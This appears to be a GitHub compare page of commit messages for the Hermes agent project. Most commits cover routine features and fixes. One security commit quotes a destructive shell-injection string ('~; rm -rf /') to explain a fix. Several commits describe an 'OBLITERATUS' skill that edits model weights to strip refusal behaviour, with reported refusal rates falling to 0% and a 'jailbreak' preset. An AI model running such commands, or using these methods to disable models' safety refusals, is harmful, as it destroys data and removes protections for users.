Compare commits

..

1004 Commits

Author SHA1 Message Date
teknium1
c1775de56f feat: filesystem checkpoints and /rollback command
Automatic filesystem snapshots before destructive file operations,
with user-facing rollback.  Inspired by PR #559 (by @alireza78a).

Architecture:
- Shadow git repos at ~/.hermes/checkpoints/{hash}/ via GIT_DIR
- CheckpointManager: take/list/restore, turn-scoped dedup, pruning
- Transparent — the LLM never sees it, no tool schema, no tokens
- Once per turn — only first write_file/patch triggers a snapshot

Integration:
- Config: checkpoints.enabled + checkpoints.max_snapshots
- CLI flag: hermes --checkpoints
- Trigger: run_agent.py _execute_tool_calls() before write_file/patch
- /rollback slash command in CLI + gateway (list, restore by number)
- Pre-rollback snapshot auto-created on restore (undo the undo)

Safety:
- Never blocks file operations — all errors silently logged
- Skips root dir, home dir, dirs >50K files
- Disables gracefully when git not installed
- Shadow repo completely isolated from project git

Tests: 35 new tests, all passing (2798 total suite)
Docs: feature page, config reference, CLI commands reference
2026-03-10 00:49:15 -07:00
teknium1
de6750ed23 feat: add data-driven skin/theme engine for CLI customization
Adds a skin system that lets users customize the CLI's visual appearance
through data files (YAML) rather than code changes. Skins define: color
palette, spinner faces/verbs/wings, branding text, and tool output prefix.

New files:
- hermes_cli/skin_engine.py — SkinConfig dataclass, built-in skins
  (default, ares, mono, slate), YAML loader for user skins from
  ~/.hermes/skins/, skin management API
- tests/hermes_cli/test_skin_engine.py — 26 tests covering config,
  built-in skins, user YAML skins, display integration

Modified files:
- agent/display.py — skin-aware spinner wings, faces, verbs, tool prefix
- hermes_cli/banner.py — skin-aware banner colors (title, border, accent,
  dim, text, session) via _skin_color()/_skin_branding() helpers
- cli.py — /skin command handler, skin init from config, skin-aware
  response box label and welcome message
- hermes_cli/config.py — add display.skin default
- hermes_cli/commands.py — add /skin to slash commands

Built-in skins:
- default: classic Hermes gold/kawaii
- ares: crimson/bronze war-god theme (from community PRs #579/#725)
- mono: clean grayscale
- slate: cool blue developer theme

User skins: drop a YAML file in ~/.hermes/skins/ with name, colors,
spinner, branding, and tool_prefix fields. Missing values inherit from
the default skin.
2026-03-10 00:37:28 -07:00
teknium1
c0ffd6b704 feat: expand OpenClaw migration to cover all platform channels, provider keys, model/TTS config, shared skills, and daily memory
Adds 9 new migration categories to the OpenClaw-to-Hermes migration script:

Platform channels (non-secret, in user-data preset):
- discord-settings: bot token + allowlist → .env
- slack-settings: bot/app tokens + allowlist → .env
- whatsapp-settings: allowlist → .env
- signal-settings: account, HTTP URL, allowlist → .env

Configuration:
- model-config: default model → config.yaml
- tts-config: TTS provider/voice settings → config.yaml tts.*

Data:
- shared-skills: ~/.openclaw/skills/ → ~/.hermes/skills/openclaw-imports/
- daily-memory: workspace/memory/*.md entries → merged into MEMORY.md

Secrets (full preset only, requires --migrate-secrets):
- provider-keys: OpenRouter/OpenAI/Anthropic API keys, ElevenLabs/OpenAI TTS keys

Bug fix: workspace-agents now records 'skipped' status when source is
missing instead of silently returning (invisible failure in reports).

Total migration options: 10 → 19
Tests: 14 → 24 (10 new tests covering all new categories)
Full suite: 2798 passed, 0 failures
2026-03-10 00:35:14 -07:00
teknium1
8b9de366f2 Merge PR #570: feat: OpenClaw migration skill + CLI panel width improvements
Authored by unmodeled-tyler. Adds openclaw-migration skill to optional-skills/
with migration script, SKILL.md, and 7 tests. Also improves clarify/approval
panel rendering with dynamic width calculation.
2026-03-10 00:06:40 -07:00
teknium1
60d3f79c72 Merge PR #565: fix: sanitize FTS5 queries and close mirror DB connections
Authored by 0xbyt4. Fixes #N/A (no linked issue).

- Sanitize user input before FTS5 MATCH to prevent OperationalError on
  special characters (C++, unbalanced quotes, dangling operators, etc.)
- Close SessionDB connection in mirror._append_to_sqlite() via finally block
- Added tests for both fixes
2026-03-09 23:59:26 -07:00
teknium1
6f3a673aba fix: restore success-path server_sock.close() before rpc_thread.join()
PR #568 moved the close entirely to the finally block, but the success-path
close is needed to break the RPC thread out of accept() immediately. Without
it, rpc_thread.join(3) may block for up to 3 seconds if the child process
never connected. The finally-block close remains as a safety net for the
exception/error path (the actual fd leak fix).
2026-03-09 23:40:20 -07:00
teknium1
ab6a6338c4 Merge PR #568: fix(code-execution): close server socket in finally block to prevent fd leak
Authored by alireza78a. Moves server_sock.close() into the finally block so
the socket fd is always cleaned up, even if an exception occurs between socket
creation and the success-path close.
2026-03-09 23:39:13 -07:00
teknium1
1ec8c1fcaa Merge PR #564: fix: count actual tool calls instead of tool-related messages
Authored by 0xbyt4. Fixes tool_call_count double-counting tool responses
and under-counting parallel tool calls.
2026-03-09 23:32:54 -07:00
teknium1
739eb6702e Merge PR #551: Make skill file writes atomic
Authored by aydnOktay. Adds _atomic_write_text() helper using tempfile.mkstemp()
+ os.replace() to prevent skill file corruption on crash/interrupt. All 7
write_text() calls in skill_manager_tool.py converted, including rollback writes
during security scans.
2026-03-09 23:31:43 -07:00
teknium1
1aa7badb3c fix: add missing Platform.SIGNAL to toolset mappings, update test + config docs
Platform.SIGNAL was missing from default_toolset_map and platform_config_key
in gateway/run.py, causing Signal to silently fall back to hermes-telegram
toolset (same bug as HomeAssistant, fixed in PR #538).

Also updates:
- tests/test_toolsets.py: include hermes-signal and hermes-homeassistant in
  the platform core-tools consistency check
- cli-config.yaml.example: document signal and homeassistant platform keys
2026-03-09 23:27:19 -07:00
teknium1
ee4008431a fix: stop terminal border flashing with steady cursor and TUI spinner widget
Cherry-picked and improved from PR #470 (fixes #464).

Problem: On Ubuntu 24.04 with ghostty + tmux, the prompt input box
border lines flash due to cursor blink and raw spinner terminal writes
conflicting with prompt_toolkit's rendering.

Changes:
- cli.py: Add CursorShape.BLOCK to Application() to disable cursor blink
- cli.py: Add thinking_callback + spinner_widget in TUI layout so
  thinking status displays as a proper prompt_toolkit widget instead of
  raw terminal writes that conflict with the TUI renderer
- run_agent.py: Add thinking_callback parameter to AIAgent; when set,
  uses the callback instead of KawaiiSpinner for thinking display

What was NOT changed (preserving existing behavior):
- agent/display.py: Untouched. KawaiiSpinner _write() stdout capture,
  _animate() logic, and 0.12s frame interval all preserved. This
  protects subagent stdout redirection and keeps smooth animations
  for non-CLI contexts (gateway, batch runner).
- Original emoji spinner types (brain/sparkle/pulse/moon/star) preserved
  for all non-CLI contexts.

Fixes from original PR #470:
- CursorShape.STEADY_BLOCK -> CursorShape.BLOCK (STEADY_BLOCK doesn't
  exist in prompt_toolkit 3.0.52)
- Removed duplicate self._spinner_text = '' line
- Removed redundant nested if-checks

Tested: 2706 tests pass, interactive CLI verified via tmux.
2026-03-09 23:26:43 -07:00
teknium1
88f8bcde38 Merge PR #538: fix cron HERMES_HOME path mismatch, missing HomeAssistant toolset mapping, Daytona timeout drift
Authored by Himess. Three independent fixes:
- cron/jobs.py: respect HERMES_HOME env var (consistent with scheduler.py)
- gateway/run.py: add Platform.HOMEASSISTANT to toolset mappings
- tools/environments/daytona.py: use time.monotonic() for timeout deadline
2026-03-09 23:20:52 -07:00
teknium1
2285615010 Merge PR #533: fix: use regex for search output parsing to handle Windows drive-letter paths
Authored by Himess. Replaces split(':', 2) with regex that optionally
captures Windows drive-letter prefix in rg/grep output parsing. Fixes
search_files returning zero results on Windows where paths like
C:\path\file.py:42:content were misparsed by naive colon splitting.
No behavior change on Unix/Mac.
2026-03-09 23:18:42 -07:00
teknium1
805ce8177b Merge PR #529: fix: restrict .env file permissions to owner-only
Authored by Himess. Adds 0600 chmod on ~/.hermes/.env after writing API keys,
matching the existing pattern in auth.py for auth.json.
2026-03-09 23:10:59 -07:00
teknium1
bdce33e239 Merge PR #810: fix(cli): handle unquoted multi-word session names in -c/--continue and -r/--resume 2026-03-09 23:08:45 -07:00
Teknium
9be8d88ccc Merge pull request #815 from NousResearch/hermes/hermes-5ab2a29e
Add hermes-atropos-environments bundled skill
2026-03-09 23:06:19 -07:00
teknium1
6ab3ebf195 Add hermes-atropos-environments skill (bundled)
Add comprehensive skill for building, testing, and debugging Hermes Agent
RL environments for Atropos training. Includes:

- SKILL.md: Full guide covering HermesAgentBaseEnv interface, required
  methods, config class, CLI modes (serve/process/evaluate), reward
  function patterns, common pitfalls, and minimum implementation checklist
- New 'Inference Setup' section: instructs the agent to always ask the
  user for their inference provider (OpenRouter + model choice, self-hosted
  VLLM endpoint, or other OpenAI-compatible API) before running tests
- references/agentresult-fields.md: AgentResult dataclass field reference
- references/atropos-base-env.md: Atropos BaseEnv API reference
- references/usage-patterns.md: Step-by-step patterns for process,
  evaluate, serve, and smoke test modes

Will be auto-synced to ~/.hermes/skills/ via skills_sync.
2026-03-09 23:04:17 -07:00
teknium1
0a628c1aef fix(cli): handle unquoted multi-word session names in -c/--continue and -r/--resume
When a user runs `hermes -w -c Pokemon Agent Dev` without quoting the
session name, argparse would fail with:
  error: argument command: invalid choice: 'Agent'

This is because argparse parses `-c Pokemon` (consuming one token via
nargs='?'), then sees 'Agent' and tries to match it as a subcommand.

Fix: add _coalesce_session_name_args() that pre-processes sys.argv before
argparse, joining consecutive non-flag, non-subcommand tokens after -c or
-r into a single argument. This makes both quoted and unquoted multi-word
session names work transparently.

Includes 17 tests covering all edge cases: multi-word names, single-word,
bare flags, flag ordering, subcommand boundaries, and passthrough.
2026-03-09 21:36:29 -07:00
teknium1
36328a996f Merge PR #458: Add explicit UTF-8 encoding to config/data file I/O
Authored by shitcoinsherpa. Adds encoding='utf-8' to all text-mode
open() calls in gateway/run.py, gateway/config.py, hermes_cli/config.py,
hermes_cli/main.py, and hermes_cli/status.py. Prevents encoding errors
on Windows where the default locale is not UTF-8.

Also fixed 4 additional open() calls in gateway/run.py that were added
after the PR branch was created.
2026-03-09 21:19:20 -07:00
shitcoinsherpa
4bc32dc0f1 Fix password reader for Windows using msvcrt.getwch()
The existing password prompt uses /dev/tty and termios to read input
with echo disabled. Neither exists on Windows.

On Windows, msvcrt.getwch() reads a single character from the console
without echoing it. This adds a Windows code path that uses getwch()
in a loop, collecting characters until Enter is pressed.

The Unix path using termios and /dev/tty is unchanged.
2026-03-09 21:15:59 -07:00
teknium1
4de5e017f1 Merge PR #457: Use pywinpty for PTY support on Windows
Authored by shitcoinsherpa. Imports winpty.PtyProcess on Windows instead
of ptyprocess.PtyProcess, and adds platform markers to the [pty] extra
so the correct package is installed automatically.
2026-03-09 21:09:56 -07:00
teknium1
3e352f8a0d fix: add upstream guard for non-dict function_args + tests for build_tool_preview
Complements PR #453 by 0xbyt4. Adds isinstance(dict) guard in
run_agent.py to catch cases where json.loads returns non-dict
(e.g. null, list, string) before they reach downstream code.

Also adds 15 tests for build_tool_preview covering None args,
empty dicts, known/unknown tools, fallback keys, truncation,
and all special-cased tools (process, todo, memory, session_search).
2026-03-09 21:01:40 -07:00
teknium1
28ae5db9b0 Merge PR #453: fix: handle None args in build_tool_preview
Authored by 0xbyt4. Adds defensive guard for None/empty args in
build_tool_preview() to prevent crashes when a model returns null
tool call arguments.
2026-03-09 20:58:34 -07:00
teknium1
d5811c887a Merge: fix double judge call + eval buffer pollution in WebResearchEnv 2026-03-09 20:57:54 -07:00
teknium1
975fd86dc4 fix: eliminate double LLM judge call and eval buffer pollution
evaluate() was calling _llm_judge twice per item (once via
compute_reward, once directly) — double the API cost for no benefit.
Now extracts correctness from compute_reward's buffer instead.

Also: compute_reward appends to training metric buffers during eval,
which would pollute wandb training charts. Now rolls back buffer
entries added during eval so training metrics stay clean.
2026-03-09 20:57:46 -07:00
teknium1
0ff7fe3ee2 Merge PR #439: docs: fix spelling of 'publicly'
Authored by JackTheGit. Simple typo fix: publically → publicly in axolotl reference docs.
2026-03-09 20:55:37 -07:00
teknium1
b9d55d5719 feat: add pokemon-player skill with battle-tested gameplay tips
Comprehensive skill for playing Pokemon Red/Blue via the pokemon-agent
package (NousResearch/pokemon-agent). Includes:

- Full startup procedure (uv venv, server, localhost.run dashboard tunnel)
- Save/load lifecycle and naming conventions
- Gameplay loop with emphasis on frequent vision checks
- Hard-learned navigation tips:
  - Use vision every 2-4 steps (RAM state is blind to obstacles)
  - Wait 2-3 seconds after door/stair warps for map transitions
  - Sidestep after exiting buildings to avoid re-entering
  - Hold B to speed Gen 1's slow text scrolling
  - Ledges are one-way — use vision to find gaps
- Battle strategy, type chart, Gen 1 quirks
- Memory conventions with PKM: prefix
- Progression milestones through all 8 gyms + Elite Four
2026-03-09 20:29:38 -07:00
teknium1
ab7dc22984 Merge: WebResearchEnv evaluate() with full agent loop + tools 2026-03-09 19:53:36 -07:00
teknium1
bf8350ac18 fix: evaluate() uses full agent loop with tools, not single-turn
The evaluate method was doing single-turn chat_completion (no tools),
which defeats the purpose of an agentic research benchmark. Fixed to
run the full HermesAgentLoop with web_search/web_extract tools.

Results comparison (Claude Sonnet 4.5, FRAMES benchmark):
  Without tools (broken): 0.56 mean correctness
  With agent loop + tools: 1.00 mean correctness, 0.994 reward

New eval metrics: mean_correctness, mean_reward, mean_tool_calls,
tool_usage_rate — all logged via evaluate_log() in lighteval format.
2026-03-09 19:53:28 -07:00
teknium1
a5c6348d41 Merge: WebResearchEnv compute_reward fix (verified with live test) 2026-03-09 19:29:19 -07:00
teknium1
320f881e0b fix: WebResearchEnv compute_reward extracts from AgentResult.messages
AgentResult has .messages (list of dicts), not .final_response or
.tool_calls. Fixed compute_reward to extract the final response
and tool names from the message history.

Verified with live process mode test:
  - Agent used 7 tool calls (web_search, web_extract)
  - Produced a 1106-char researched response about Winter Olympics
  - Reward: 0.384 (partial correctness via LLM judge)
  - JSONL output contains valid tokens, masks, scores, messages
2026-03-09 19:29:12 -07:00
teknium1
172a38c344 fix: Docker persistent bind mounts fail with Permission denied
cap-drop ALL removes DAC_OVERRIDE, which root needs to write to
bind-mounted directories owned by the host user (uid 1000). This
broke persistent Docker sandboxes — the container couldn't write
to /workspace or /root.

Add back the minimum capabilities needed:
- DAC_OVERRIDE: root can write to bind-mounted dirs owned by host user
- CHOWN: package managers (pip, npm, apt) need to set file ownership
- FOWNER: needed for operations on files owned by other users

Still drops all other capabilities (NET_RAW, SYS_ADMIN, etc.) and
keeps no-new-privileges. Security boundary is the container itself.

Verified end-to-end: create files → destroy container → new container
with same task_id → files persist on host and are accessible in the
new container.
2026-03-09 17:52:33 -07:00
teknium1
8bc0d4f77d Merge: WebResearchEnv Atropos standards compliance 2026-03-09 17:45:57 -07:00
teknium1
8eabdefa8a fix: bring WebResearchEnv up to Atropos environment standards
The environment was merged missing several standard components.
Updated to match the patterns established by 82 Atropos environments
and our own HermesAgentBaseEnv contract.

Added:
- WebResearchEnvConfig — custom Pydantic config with reward weights,
  efficiency thresholds, eval settings, dataset config (all tunable
  via CLI/YAML without code changes)
- config_init() classmethod — default server config (OpenRouter +
  Claude) so the env works out of the box
- wandb_log() override — logs reward breakdown metrics (correctness,
  tool_usage, efficiency, diversity, correct_rate, tool_usage_rate)
  with proper buffer management and super() call
- evaluate() — uses server.chat_completion instead of broken stub
  _run_agent_on_item(). Logs via evaluate_log() for lighteval-
  compatible output.

Fixed:
- Removed broken _run_agent_on_item() stub that returned empty results
- evaluate() now uses server.chat_completion (same pattern as
  TerminalTestEnv) for actual model evaluation
- compute_reward reads tool calls from AgentResult properly
- LLM judge uses self.server.chat_completion instead of ctx

Reward config is now tunable without code changes:
  --env.correctness_weight 0.6
  --env.tool_usage_weight 0.2
  --env.efficiency_weight 0.2
  --env.diversity_bonus 0.1
  --env.efficient_max_calls 5
2026-03-09 17:45:50 -07:00
teknium1
f658af45c2 Merge PR #446: fix(cli): use correct visibility filter string in codex API model fetch
Authored by PercyDikec. Fixes #445.
Changes 'hide' to 'hidden' in _fetch_models_from_api to match
_read_cache_models and the actual API response format.
2026-03-09 17:42:39 -07:00
teknium1
5212644861 fix(security): prevent shell injection in tilde-username path expansion
Validate that the username portion of ~username paths contains only
valid characters (alphanumeric, dot, hyphen, underscore) before passing
to shell echo for expansion. Previously, paths like '~; rm -rf /'
would be passed unquoted to self._exec(f'echo {path}'), allowing
arbitrary command execution.

The approach validates the username rather than using shlex.quote(),
which would prevent tilde expansion from working at all since
echo '~user' outputs the literal string instead of expanding it.

Added tests for injection blocking and valid ~username/path expansion.

Credit to @alireza78a for reporting (PR #442, issue #442).
2026-03-09 17:33:19 -07:00
teknium1
1151f84351 Merge PR #434: feat: add WebResearchEnv RL environment for multi-step web research
Authored by jackx707. Adds web_research_env.py (Atropos RL environment for
multi-step web research using FRAMES benchmark) and batch generation config.
2026-03-09 17:24:20 -07:00
teknium1
9abd6bf342 fix: gateway missing docker_volumes config bridge + list serialization bug
The gateway's config.yaml → env var bridge was missing docker_volumes,
so Docker volume mounts configured in config.yaml were ignored for
gateway sessions (Telegram, Discord, etc.) while working in CLI.

Also fixes list serialization: str() produces Python repr with single
quotes which json.loads() in terminal_tool.py can't parse. Now uses
json.dumps() for list values.

Based on PR #431 by @manuelschipper (applied manually due to stale branch).
2026-03-09 17:24:00 -07:00
Teknium
d2c7ef6b41 Merge pull request #792 from NousResearch/hermes/hermes-d2f5523a
Merge PR #428: Improve type hints and error diagnostics in vision_tools + add 42 tests
2026-03-09 17:21:44 -07:00
teknium1
a34102049b Merge: vision auto-detection fallback to local endpoints 2026-03-09 15:36:27 -07:00
teknium1
ef5d811aba fix: vision auto-detection now falls back to custom/local endpoints
Vision auto-mode previously only tried OpenRouter, Nous, and Codex
for multimodal — deliberately skipping custom endpoints with the
assumption they 'may not handle vision input.' This caused silent
failures for users running local multimodal models (Qwen-VL, LLaVA,
Pixtral, etc.) without any cloud API keys.

Now custom endpoints are tried as a last resort in auto mode. If the
model doesn't support vision, the API call fails gracefully — but
users with local vision models no longer need to manually set
auxiliary.vision.provider: main in config.yaml.

Reported by @Spadav and @kotyKD.
2026-03-09 15:36:19 -07:00
teknium1
2d44ed1c5b test: add comprehensive tests for vision_tools (42 tests)
Covers PR #428 changes and existing vision_tools functionality:
- _validate_image_url: 20 tests for urlparse-based validation
- _determine_mime_type: 6 tests for MIME type detection
- _image_to_base64_data_url: 3 tests for base64 conversion
- _handle_vision_analyze: 5 tests for type hints, prompt building,
  AUXILIARY_VISION_MODEL env var override
- Error logging exc_info: 3 async tests verifying stack traces are
  logged on download failure, analysis error, and cleanup error
- check_vision_requirements & get_debug_session_info: 2 basic tests
- Registry integration: 3 tests for tool registration
2026-03-09 15:32:02 -07:00
teknium1
fa2e72ae9c docs: document docker_volumes config for shared host directories
The Docker backend already supports user-configured volume mounts via
docker_volumes, but it was undocumented — missing from DEFAULT_CONFIG,
cli.py defaults, and configuration docs.

Changes:
- hermes_cli/config.py: Add docker_volumes to DEFAULT_CONFIG with
  inline documentation and examples
- cli.py: Add docker_volumes to load_cli_config defaults
- configuration.md: Full Docker Volume Mounts section with YAML
  examples, use cases (providing files, receiving outputs, shared
  workspaces), and env var alternative
2026-03-09 15:29:34 -07:00
teknium1
5bfc4ed53b Merge PR #428: Improve type hints and error diagnostics in vision_tools
Authored by aydnOktay. Improves URL validation with urlparse, adds exc_info
to error logs for full stack traces, and tightens type hints.

Resolved merge conflict in _handle_vision_analyze: kept PR's string formatting
with our AUXILIARY_VISION_MODEL env var logic.
2026-03-09 15:27:54 -07:00
teknium1
520aec20e0 fix: add mcp to dev dependencies for test suite
MCP tests import from mcp.types but mcp wasn't in the dev optional
dependencies. Fresh 'pip install -e .[dev]' setups failed 3 tests.

Based on PR #427 by @teyrebaz33 (applied manually due to stale branch).
2026-03-09 15:12:54 -07:00
teknium1
64bec1d060 fix: Slack gateway setup missing event subscriptions and scopes
The 'hermes gateway setup' instructions for Slack were missing:
- The 'Subscribe to Events' step entirely (message.im, message.channels,
  app_mention, message.groups)
- Several required scopes (app_mentions:read, groups:history, users:read,
  files:write)
- Warning about bot only working in DMs without message.channels
- Step to invite the bot to channels

The 'hermes setup' flow (setup.py) and the website docs (slack.md)
already had the correct information — only gateway.py was outdated.

Reported by JordanB on Slack.
2026-03-09 14:31:19 -07:00
teknium1
ac58309dbd docs: improve Slack setup guide with channel event subscriptions and scopes
The #1 support issue with Slack is 'bot works in DMs but not channels'.
This is almost always caused by missing event subscriptions (message.channels,
message.groups) or missing OAuth scopes (channels:history, groups:history).

Changes:
- slack.md: Move channels:history and groups:history from optional to required
  scopes. Move message.channels and message.groups to required events. Add new
  'How the Bot Responds' section explaining DM vs channel behavior. Add Step 8
  for inviting bot to channels. Expand troubleshooting table with specific
  'works in DMs not channels' entry. Add quick checklist for channel debugging.
- setup.py: Expand Slack setup wizard with all required scopes, event
  subscriptions, and a warning that without message.channels/message.groups
  the bot only works in DMs. Add link to full docs. Improve Member ID
  discovery instructions.
- config.py: Update SLACK_BOT_TOKEN and SLACK_APP_TOKEN descriptions to list
  required scopes and event subscriptions inline.
2026-03-09 14:00:11 -07:00
Teknium
a5a5d82a21 Merge pull request #784 from NousResearch/feat/slack-app-mention-and-documents
feat(slack): fix app_mention 404 + add document/video support
2026-03-09 13:04:50 -07:00
teknium1
34e8d088c2 feat(slack): fix app_mention 404 + add document/video support
- Register no-op app_mention event handler to suppress Bolt 404 errors.
  The 'message' handler already processes @mentions in channels, so
  app_mention is acknowledged without duplicate processing.

- Add send_document() for native file attachments (PDFs, CSVs, etc.)
  via files_upload_v2, matching the pattern from Telegram PR #779.

- Add send_video() for native video uploads via files_upload_v2.

- Handle incoming document attachments from users: download, cache,
  and inject text content for .txt/.md files (capped at 100KB),
  following the same pattern as the Telegram adapter.

- Add _download_slack_file_bytes() helper for raw byte downloads.

- Add 24 new tests covering all new functionality.

Fixes the unhandled app_mention events reported in gateway logs.
2026-03-09 13:02:59 -07:00
teknium1
c754135965 fix: banner wraps in narrow terminals (Kitty, small windows)
The full HERMES-AGENT ASCII logo needs ~95 columns, and the
side-by-side caduceus + tools panel needs ~80. In narrow terminals
(Kitty default, resized windows) everything wraps into visual garbage.

Fixes:
- show_banner() auto-detects terminal width and falls back to compact
  banner when < 80 columns
- build_welcome_banner() skips the ASCII logo when < 95 columns
- Compact banner now dynamically sized via _build_compact_banner()
  instead of a hardcoded 64-char box that also wrapped in narrow terms
- Same width checks applied to /clear command's banner refresh

The up/down arrow key issue in Kitty terminal for multiline input is
a known Kitty keyboard protocol (CSI u) vs prompt_toolkit compatibility
gap — arrow keys work correctly in standard terminals and tmux. Users
can work around it by running in tmux or setting TERM=xterm-256color.
2026-03-09 05:57:36 -07:00
teknium1
c6b75baad0 feat: find-nearby skill and Telegram location support
Adds a 'find-nearby' skill for discovering nearby places using
OpenStreetMap (Overpass + Nominatim). No API keys needed. Works with:
- Coordinates (from Telegram location pins)
- Addresses, cities, zip codes, landmarks (auto-geocoded)
- Multiple place types (restaurant, cafe, bar, pharmacy, etc.)

Returns names, distances, cuisine, hours, addresses, and Google Maps
links (pin + directions). 184-line stdlib-only script.

Also adds Telegram location message handling:
- New MessageType.LOCATION in gateway base
- Telegram adapter handles LOCATION and VENUE messages
- Injects lat/lon coordinates into conversation context
- Prompts agent to ask what the user wants nearby

Inspired by PR #422 (reimplemented with simpler script and broader
skill scope — addresses/cities/zips, not just Telegram coordinates).
2026-03-09 05:31:10 -07:00
teknium1
a7ad6f6d28 Merge: custom providers instant activation + model persistence 2026-03-09 05:08:01 -07:00
teknium1
1a2141d04d fix: custom providers activate immediately, save model name
Selecting a saved custom provider now switches instantly without
probing /models — the model name is stored in the config entry
as a complete profile (name + url + key + model).

Changes:
- custom_providers entries now include 'model' field
- Selecting a saved provider with a model just activates it
- Only probes /models if no model is saved (first-time setup)
- Menu shows saved model name: 'Local (localhost:8000) — llama-70b'
- Dedup on re-entry: still activates the model, just doesn't add
  a duplicate config entry (updates model name if changed)
2026-03-09 05:07:53 -07:00
teknium1
ff3f3169b2 Merge: auto-save custom endpoints + removal option 2026-03-09 04:58:27 -07:00
teknium1
f4580b6010 feat: auto-save custom endpoints + removal option
When a user adds a custom endpoint via 'hermes model' → 'Custom
endpoint', it now automatically saves to custom_providers in
config.yaml so it persists and appears in the provider menu on
subsequent runs. Deduplicates by base_url.

Auto-generated names based on URL:
  http://localhost:8000/v1 → 'Local (localhost:8000)'
  https://xyz.runpod.ai/v1 → 'RunPod (xyz.runpod.ai)'
  https://api.example.com/v1 → 'Api.example.com'

Also adds 'Remove a saved custom provider' option to the menu
(only shown when custom providers exist) with a selection UI
to pick which one to remove.

Users can also manually edit custom_providers in config.yaml
for full control over names and settings.
2026-03-09 04:58:20 -07:00
teknium1
7b63a787b3 Merge: named custom providers in hermes model 2026-03-09 03:45:26 -07:00
teknium1
069570d103 feat: support multiple named custom providers in hermes model
Users with multiple local servers or custom endpoints can now define
them all in config.yaml and switch between them from the model
selection menu:

  custom_providers:
    - name: 'Local Llama 70B'
      base_url: 'http://localhost:8000/v1'
      api_key: 'not-needed'
    - name: 'RunPod vLLM'
      base_url: 'https://xyz.runpod.ai/v1'
      api_key: 'rp_xxxxx'

These appear in `hermes model` provider selection alongside the
built-in providers. When selected, the endpoint's /models API is
probed to show available models in a selection menu.

Previously only a single 'Custom endpoint' option existed, requiring
manual URL entry each time you wanted to switch between local servers.

Requested by @ZiarnoBobu on Twitter.
2026-03-09 03:45:17 -07:00
teknium1
0dafdcab86 Merge: skill reorganization + sub-category support
- Sub-category support in prompt_builder.py (backwards-compatible)
- Split mlops (40 skills) into 7 logical sub-categories
- Merged 8 singleton categories into logical parents
- Fixed 2 misplaced skills (code-review, ml-paper-writing)
2026-03-09 03:40:11 -07:00
Teknium
654e16187e feat(mcp): add sampling support — server-initiated LLM requests (#753)
Add MCP sampling/createMessage capability via SamplingHandler class.

Text-only sampling + tool use in sampling with governance (rate limits,
model whitelist, token caps, tool loop limits). Per-server audit metrics.

Based on concept from PR #366 by eren-karakus0. Restructured as class-based
design with bug fixes and tests using real MCP SDK types.

50 new tests, 2600 total passing.
2026-03-09 03:37:38 -07:00
teknium1
732c66b0f3 refactor: reorganize skills into sub-categories
The skills directory was getting disorganized — mlops alone had 40
skills in a flat list, and 12 categories were singletons with just
one skill each.

Code change:
- prompt_builder.py: Support sub-categories in skill scanner.
  skills/mlops/training/axolotl/SKILL.md now shows as category
  'mlops/training' instead of just 'mlops'. Backwards-compatible
  with existing flat structure.

Split mlops (40 skills) into 7 sub-categories:
- mlops/training (12): accelerate, axolotl, flash-attention,
  grpo-rl-training, peft, pytorch-fsdp, pytorch-lightning,
  simpo, slime, torchtitan, trl-fine-tuning, unsloth
- mlops/inference (8): gguf, guidance, instructor, llama-cpp,
  obliteratus, outlines, tensorrt-llm, vllm
- mlops/models (6): audiocraft, clip, llava, segment-anything,
  stable-diffusion, whisper
- mlops/vector-databases (4): chroma, faiss, pinecone, qdrant
- mlops/evaluation (5): huggingface-tokenizers,
  lm-evaluation-harness, nemo-curator, saelens, weights-and-biases
- mlops/cloud (2): lambda-labs, modal
- mlops/research (1): dspy

Merged singleton categories:
- gifs → media (gif-search joins youtube-content)
- music-creation → media (heartmula, songsee)
- diagramming → creative (excalidraw joins ascii-art)
- ocr-and-documents → productivity
- domain → research (domain-intel)
- feeds → research (blogwatcher)
- market-data → research (polymarket)

Fixed misplaced skills:
- mlops/code-review → software-development (not ML-specific)
- mlops/ml-paper-writing → research (academic writing)

Added DESCRIPTION.md files for all new/updated categories.
2026-03-09 03:35:53 -07:00
teknium1
1f0944de21 fix: handle non-string content from OpenAI-compatible servers (#759)
Some local LLM servers (llama-server, etc.) return message.content as
a dict or list instead of a plain string. This caused AttributeError
'dict object has no attribute strip' on every API call.

Normalizes content to string immediately after receiving the response:
- dict: extracts 'text' or 'content' field, falls back to json.dumps
- list: extracts text parts (OpenAI multimodal content format)
- other: str() conversion

Applied at the single point where response.choices[0].message is read
in the main agent loop, so all downstream .strip()/.startswith()/[:100]
operations work regardless of server implementation.

Closes #759
2026-03-09 03:32:32 -07:00
teknium1
f1a1b58319 fix: hermes setup doesn't update provider when switching to OpenRouter
When switching FROM Codex/Nous/custom TO OpenRouter via 'hermes setup',
the old provider stayed active because setup only saved the API key but
never updated config.yaml or auth.json. This caused resolve_provider()
to keep returning the old provider (e.g. openai-codex) even after the
user selected OpenRouter.

Fix: the OpenRouter path in setup now deactivates any OAuth provider
in auth.json and writes model.provider='openrouter' to config.yaml,
matching what all other provider paths already do.
2026-03-09 03:14:22 -07:00
teknium1
c21d77ca08 Merge: OBLITERATUS skill v2.0 + unified gateway compression
OBLITERATUS skill (PR #408 updated):
- 9 CLI methods, 28 analysis modules, 116 model presets
- Default method: advanced (multi-direction SVD, norm-preserving)
- Live-tested: Qwen2.5-3B 75%→0% refusal, Qwen2.5-0.5B 60%→20%
- References, templates, and real-world pitfalls included

Gateway compression fix (PR #739):
- Unified session hygiene with agent compression config
- Uses model context length × compression.threshold from config.yaml
- Removed hardcoded 100k/200-msg thresholds
2026-03-09 02:59:41 -07:00
teknium1
d6c710706f docs: add real-world testing findings to OBLITERATUS skill
Added pitfalls discovered during live abliteration testing:
- Models < 1B have fragmented refusal, respond poorly (0.5B: 60%→20%)
- Models 3B+ work much better (3B: 75%→0% with advanced defaults)
- aggressive method can backfire on small models (made it worse)
- Spectral certification RED is common even when refusal rate is 0%
- Fixed torch property: total_mem → total_memory
2026-03-09 02:52:54 -07:00
teknium1
a6d3becd6a feat: update OBLITERATUS skill to v2.0 — match current repo state
Major updates to reflect the current OBLITERATUS codebase:

- Change default recommendation from 'informed' (experimental) to
  'advanced' (reliable, well-tested multi-direction SVD)
- Add new CLI commands: tourney, recommend, strategies, report,
  aggregate, abliterate (alias)
- Add --direction-method flag (diff_means, svd, leace)
- Add strategies module (embedding/FFN ablation, head pruning,
  layer removal)
- Add evaluation module with LM Eval Harness integration
- Expand analysis modules from 15 to 28
- Add Apple Silicon (MLX) support
- Add study presets (quick, jailbreak, knowledge, etc.)
- Add --contribute, --verify-sample-size, --preset flags
- Add complete CLI command reference table
